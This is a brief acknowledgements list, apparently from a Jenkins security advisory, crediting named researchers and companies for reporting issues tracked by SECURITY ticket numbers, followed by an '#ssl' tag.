
*   **Daniel Beck, CloudBees, Inc.** for SECURITY-879, SECURITY-931, SECURITY-1053, SECURITY-1376
*   **David Fiser of Trend Micro Nebula working with Trend Micro's Zero Day Initiative** for SECURITY-1428, SECURITY-1430
*   **Jesse Glick, CloudBees, Inc.** for SECURITY-922
*   **MWR labs (@mwrlabs)** for SECURITY-751
*   **Matthias Schmalz, SAP SE** for SECURITY-157
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1008, SECURITY-1099
*   **Oleg Nenashev, CloudBees, Inc., and, independently, Viktor Gazdag NCC Group** for SECURITY-1482
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-795, SECURITY-796

Tag

#ssl